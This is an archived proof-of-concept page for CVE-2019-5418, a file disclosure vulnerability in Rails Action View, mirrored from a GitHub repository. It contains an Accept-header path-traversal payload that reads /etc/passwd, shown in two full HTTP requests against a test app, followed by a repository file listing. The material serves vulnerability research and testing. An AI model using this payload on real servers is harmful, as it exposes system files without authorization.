Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2019-5418 PoC — Action View 信息泄露漏洞

Source
https://github.com/omarkurt/CVE-2019-5418
Associated Vulnerability
Title:Action View 信息泄露漏洞 (CVE-2019-5418)
Description:Action View中存在信息泄露漏洞。攻击者可利用该漏洞泄露文件内容。
Description
File Content Disclosure on Rails Test Case - CVE-2019-5418
Readme
# CVE-2019-5418 Test case 

Run : 
```sh
$ rails s
```

PoC : 
```html
Accept: ../../../../../../../../etc/passwd{{
```

--- 
Req 1 - 
```sh
GET /shitblock HTTP/1.1
Host: REDACTED:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: diyarbakir_guzel_baglar_delale_lorke <------ CATCH
Content-Length: 306
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: firstVisit=1552167456698; CSRF-Token-HOYYT=grQmu9F3Y5hazpvr6T5TtWKj4HqPFhea; sessionid-HOYYT=i3VkCeXtjRJJHUxc7xEEjbecD53xbvaN
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

```

![normal-request](https://github.com/omarkurt/CVE-2019-5418/blob/master/2.png)


Req 2 - 
```sh
GET /shitblock HTTP/1.1
Host: REDACTED:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: ../../../../../../../../etc/passwd{{
Content-Length: 306
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: firstVisit=1552167456698; CSRF-Token-HOYYT=grQmu9F3Y5hazpvr6T5TtWKj4HqPFhea; sessionid-HOYYT=i3VkCeXtjRJJHUxc7xEEjbecD53xbvaN
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
```


![PoC](https://github.com/omarkurt/CVE-2019-5418/blob/master/PoC.png)


Source : [File Content Disclosure on Rail - CVE-2019-5418](https://chybeta.github.io/2019/03/16/Analysis-for%E3%80%90CVE-2019-5418%E3%80%91File-Content-Disclosure-on-Rails/)
File Snapshot

 [4.0K]  /data/pocs/5605c41c0da0ffd1bcd9b954ed6248b645a886a6
├── [ 20K]  2.png
├── [4.0K]  app
│   ├── [4.0K]  assets
│   │   ├── [4.0K]  config
│   │   │   └── [ 101]  manifest.js
│   │   ├── [4.0K]  images
│   │   ├── [4.0K]  javascripts
│   │   │   ├── [ 721]  application.js
│   │   │   ├── [ 360]  cable.js
│   │   │   ├── [4.0K]  channels
│   │   │   └── [ 211]  shitblock.coffee
│   │   └── [4.0K]  stylesheets
│   │       ├── [ 709]  application.css
│   │       └── [ 180]  shitblock.scss
│   ├── [4.0K]  channels
│   │   └── [4.0K]  application_cable
│   │       ├── [  79]  channel.rb
│   │       └── [  85]  connection.rb
│   ├── [4.0K]  controllers
│   │   ├── [  57]  application_controller.rb
│   │   ├── [4.0K]  concerns
│   │   └── [ 142]  shitblock_controller.rb
│   ├── [4.0K]  helpers
│   │   ├── [  29]  application_helper.rb
│   │   └── [  27]  shitblock_helper.rb
│   ├── [4.0K]  jobs
│   │   └── [  43]  application_job.rb
│   ├── [4.0K]  mailers
│   │   └── [ 102]  application_mailer.rb
│   ├── [4.0K]  models
│   │   ├── [  78]  application_record.rb
│   │   └── [4.0K]  concerns
│   └── [4.0K]  views
│       └── [4.0K]  layouts
│           ├── [ 349]  application.html.erb
│           ├── [ 229]  mailer.html.erb
│           └── [  13]  mailer.text.erb
├── [4.0K]  bin
│   ├── [ 125]  bundle
│   ├── [ 141]  rails
│   ├── [  90]  rake
│   ├── [ 957]  setup
│   ├── [ 819]  update
│   └── [ 303]  yarn
├── [4.0K]  config
│   ├── [ 662]  application.rb
│   ├── [ 207]  boot.rb
│   ├── [ 195]  cable.yml
│   ├── [ 464]  credentials.yml.enc
│   ├── [ 594]  database.yml
│   ├── [ 128]  environment.rb
│   ├── [4.0K]  environments
│   │   ├── [2.1K]  development.rb
│   │   ├── [3.9K]  production.rb
│   │   └── [1.8K]  test.rb
│   ├── [4.0K]  initializers
│   │   ├── [ 216]  application_controller_renderer.rb
│   │   ├── [ 630]  assets.rb
│   │   ├── [ 404]  backtrace_silencers.rb
│   │   ├── [1.1K]  content_security_policy.rb
│   │   ├── [ 244]  cookies_serializer.rb
│   │   ├── [ 194]  filter_parameter_logging.rb
│   │   ├── [ 647]  inflections.rb
│   │   ├── [ 156]  mime_types.rb
│   │   └── [ 485]  wrap_parameters.rb
│   ├── [4.0K]  locales
│   │   └── [ 848]  en.yml
│   ├── [1.4K]  puma.rb
│   ├── [ 161]  routes.rb
│   ├── [ 111]  spring.rb
│   └── [1.1K]  storage.yml
├── [ 130]  config.ru
├── [4.0K]  db
│   ├── [ 771]  schema.rb
│   └── [ 370]  seeds.rb
├── [2.1K]  Gemfile
├── [5.2K]  Gemfile.lock
├── [4.0K]  lib
│   ├── [4.0K]  assets
│   └── [4.0K]  tasks
├── [4.0K]  log
├── [  71]  package.json
├── [ 15K]  PoC.png
├── [4.0K]  public
│   ├── [1.7K]  404.html
│   ├── [1.7K]  422.html
│   ├── [1.6K]  500.html
│   ├── [   0]  apple-touch-icon.png
│   ├── [   0]  apple-touch-icon-precomposed.png
│   ├── [   0]  favicon.ico
│   └── [  98]  robots.txt
├── [ 227]  Rakefile
├── [1.5K]  README.md
├── [4.0K]  storage
├── [4.0K]  test
│   ├── [ 157]  application_system_test_case.rb
│   ├── [4.0K]  controllers
│   │   └── [ 141]  shitblock_controller_test.rb
│   ├── [4.0K]  fixtures
│   │   └── [4.0K]  files
│   ├── [4.0K]  helpers
│   ├── [4.0K]  integration
│   ├── [4.0K]  mailers
│   ├── [4.0K]  models
│   ├── [4.0K]  system
│   └── [ 290]  test_helper.rb
├── [4.0K]  tmp
└── [4.0K]  vendor

41 directories, 67 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.